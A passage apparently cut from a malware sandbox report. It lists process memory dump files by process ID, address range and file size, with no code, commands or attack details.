                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1836-203-0x0000000005840000-0x00000000058DC000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    624KB

                                                                                                                                                                                                                                                                                                  • memory/1836-210-0x00000000059E0000-0x00000000059E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1836-213-0x0000000005BD0000-0x0000000005BD1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-324-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/1892-330-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-319-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-328-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-320-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-321-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-322-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-323-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-329-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-325-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-332-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-338-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-337-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-336-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-335-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-334-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-326-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-333-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1892-327-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/2188-202-0x0000000005410000-0x0000000005411000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/2188-209-0x00000000053D0000-0x00000000053D1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/2188-214-0x00000000055D0000-0x00000000055D1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/2188-189-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/2188-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/2248-386-0x00000000001C0000-0x00000000001C9000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    36KB

                                                                                                                                                                                                                                                                                                  • memory/2248-400-0x0000000000400000-0x0000000002CB1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    40.7MB

                                                                                                                                                                                                                                                                                                  • memory/2248-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/2276-411-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/2460-363-0x0000000002D20000-0x0000000002E6A000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.3MB

                                                                                                                                                                                                                                                                                                  • memory/2460-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/2460-381-0x0000000000400000-0x0000000002CB1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    40.7MB

                                                                                                                                                                                                                                                                                                  • memory/2680-372-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/2740-305-0x00000225C04C0000-0x00000225C05A4000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    912KB

                                                                                                                                                                                                                                                                                                  • memory/2740-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/2740-306-0x00000225C0710000-0x00000225C0871000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.4MB

                                                                                                                                                                                                                                                                                                  • memory/2764-436-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/2984-272-0x0000000000400000-0x00000000023BA000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    31.7MB

                                                                                                                                                                                                                                                                                                  • memory/2984-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/2984-257-0x0000000003EB0000-0x0000000003EDF000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    188KB

                                                                                                                                                                                                                                                                                                  • memory/3020-399-0x0000000002AB0000-0x0000000002AC6000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    88KB

                                                                                                                                                                                                                                                                                                  • memory/3188-261-0x0000000004030000-0x00000000040CD000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    628KB

                                                                                                                                                                                                                                                                                                  • memory/3188-127-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3188-282-0x0000000000400000-0x0000000002402000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    32.0MB

                                                                                                                                                                                                                                                                                                  • memory/3236-428-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3328-377-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3556-141-0x00000000009D0000-0x00000000009D1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3556-183-0x00007FFED6730000-0x00007FFED685C000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.2MB

                                                                                                                                                                                                                                                                                                  • memory/3556-184-0x0000000001100000-0x0000000001102000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                  • memory/3556-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3668-240-0x0000000005480000-0x0000000005481000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3668-234-0x0000000005980000-0x0000000005981000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3668-224-0x0000000000D70000-0x0000000000D71000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3668-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3668-222-0x0000000077860000-0x00000000779EE000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                                                                                                                  • memory/3668-250-0x0000000005370000-0x0000000005371000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3668-244-0x0000000003110000-0x0000000003111000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3668-238-0x0000000000D50000-0x0000000000D51000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3668-243-0x0000000003100000-0x0000000003101000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3700-425-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3712-345-0x00000000001D0000-0x00000000001DA000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                                                                                                  • memory/3712-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3736-135-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3768-134-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3768-230-0x0000000000990000-0x0000000000991000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3768-263-0x0000000005C10000-0x0000000005C11000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3768-215-0x0000000077860000-0x00000000779EE000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                                                                                                                  • memory/3828-344-0x00000000072E0000-0x00000000072E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3828-359-0x00000000072E4000-0x00000000072E6000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                  • memory/3828-331-0x0000000002E40000-0x0000000002E6F000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    188KB

                                                                                                                                                                                                                                                                                                  • memory/3828-342-0x0000000000400000-0x0000000002CD0000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    40.8MB

                                                                                                                                                                                                                                                                                                  • memory/3828-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3828-349-0x00000000072E2000-0x00000000072E3000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3828-353-0x00000000072E3000-0x00000000072E4000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3840-219-0x0000000005850000-0x0000000005851000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3840-195-0x0000000000D40000-0x0000000000D41000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3840-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3852-206-0x000000001B1E0000-0x000000001B1E2000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                  • memory/3852-205-0x0000000000C00000-0x0000000000C1E000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                                                                                                  • memory/3852-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/3852-173-0x0000000000320000-0x0000000000321000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3852-211-0x0000000002340000-0x0000000002341000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/3852-198-0x0000000000A50000-0x0000000000A51000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/4028-446-0x000000000041A61A-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/4264-358-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    36KB

                                                                                                                                                                                                                                                                                                  • memory/4264-355-0x0000000000402FAB-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/4300-404-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/4432-315-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/4476-313-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    80KB

                                                                                                                                                                                                                                                                                                  • memory/4476-308-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/4500-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/4568-262-0x000000000041A76A-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/4568-260-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    128KB

                                                                                                                                                                                                                                                                                                  • memory/4568-283-0x0000000005FC0000-0x00000000065C6000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                                  • memory/4648-289-0x0000000005080000-0x0000000005686000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                                  • memory/4648-276-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/4772-370-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/4772-387-0x00000000013E0000-0x00000000013E2000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                  • memory/4820-382-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/4820-422-0x0000000004990000-0x0000000004991000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/5044-294-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5064-301-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    12KB

                                                                                                                                                                                                                                                                                                  • memory/5064-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5100-298-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5180-487-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5224-494-0x00007FF709C04060-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5284-558-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5308-456-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5316-561-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5324-457-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5432-459-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5508-462-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5572-509-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5680-570-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5720-465-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5760-550-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5912-479-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5976-569-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/5980-480-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/6024-554-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                  • memory/6068-557-0x0000000000000000-mapping.dmp